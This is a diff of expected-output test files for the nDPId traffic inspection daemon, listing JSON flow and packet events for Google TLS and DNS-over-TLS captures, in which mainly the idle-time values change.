00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434443394683,"flow_last_seen":1434443394683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434443394683,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434443394683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1434443394683,"pkt":"AA6OTbSogMbKAJ6fCABFAAAsBqJAAEAG14usHwPg2DrUZKdTAbt6Z3LqAAAAAGACFtCOVwAAAgQFtA=="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434443394717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434443394717,"pkt":"gMbKAJ6fAA6OTbSoCABFAAAseLYAADMGsnfYOtRkrB8D4AG7p1PuIxETemdy62ASp5T+aAAAAgQFlgAA"}
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434443394851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434443394851,"pkt":"AA6OTbSogMbKAJ6fCABFAAAoBqNAAEAG146sHwPg2DrUZKdTAbt6Z3Lr7iMRFFAQFtCmzAAA"}
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","packets-captured":28,"packets-processed":28,"total-skipped-flows":0,"total-l4-data-len":7568,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1434443401353}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 28/28

100
test/results/googledns_android10.pcap.out
View File

@@ -1,61 +1,61 @@
00470{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"googledns_android10.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592552824409}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552824409,"flow_last_seen":1592552824409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552824409,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592552824409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824409,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gpUAAHcG7tcICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT59wAAAQEIChWqa0r\/\/5Cw"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592552824632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824632,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gzYAAHcG7jYICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT5GAAAAQEIChWqbCn\/\/5Cw"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592552824856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824856,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0g5MAAHcG7dkICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT4OAAAAQEIChWqbQn\/\/5Cw"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8tGBAAEAGuAjAqAGfCAgEBLusA1UTsXihAAAAAKAC\/\/9hlgAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8yAFAAEAGoGPAqAGfCAgICNrYA1WXsATAAAAAAKAC\/\/8uSAAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1592552825926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825926,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8q2cAAHcGygEICAQEwKgBnwNVu6wOvAEKE7F4oqAS6yBkegAAAgQFZAQCCAp\/X4MU\/\/\/MwQEDAwg="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1592552825927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825927,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8xdcAAHYGrI0ICAgIwKgBnwNV2tjD\/e2fl7AEwaAS6yBjdQAAAgQFZAQCCApkDcpF\/\/\/MwQEDAwg="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1592552825928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825928,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0tGFAAEAGuA\/AqAGfCAgEBLusA1UTsXiiDrwBC4AQAVd8vQAAAQEICv\/\/zMV\/X4MU"}
00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1592552825929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825929,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0yAJAAEAGoGrAqAGfCAgICNrYA1WXsATBw\/3toIAQAVd7uAAAAQEICv\/\/zMVkDcpF"}
00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552826036,"flow_last_seen":1592552826036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552826036,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1592552826036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826036,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA80uBAAEAGmYjAqAGfCAgEBLuwA1WtLB4AAAAAAKAC\/\/8imQAAAgQFtAQCCAr\/\/8zgAAAAAAEDAwg="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1592552826049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826049,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8wHkAAHcGtO8ICAQEwKgBnwNVu7B94BEWrSweAaAS6yCziAAAAgQFZAQCCAq0eUC+\/\/\/M4AEDAwg="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1592552826051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552826051,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA00uFAAEAGmY\/AqAGfCAgEBLuwA1WtLB4BfeARF4AQAVfLywAAAQEICv\/\/zOS0eUC+"}
00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552824409,"flow_last_seen":1592552824409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552824409,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592552824409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824409,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gpUAAHcG7tcICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT59wAAAQEIChWqa0r\/\/5Cw"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592552824632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824632,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gzYAAHcG7jYICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT5GAAAAQEIChWqbCn\/\/5Cw"}
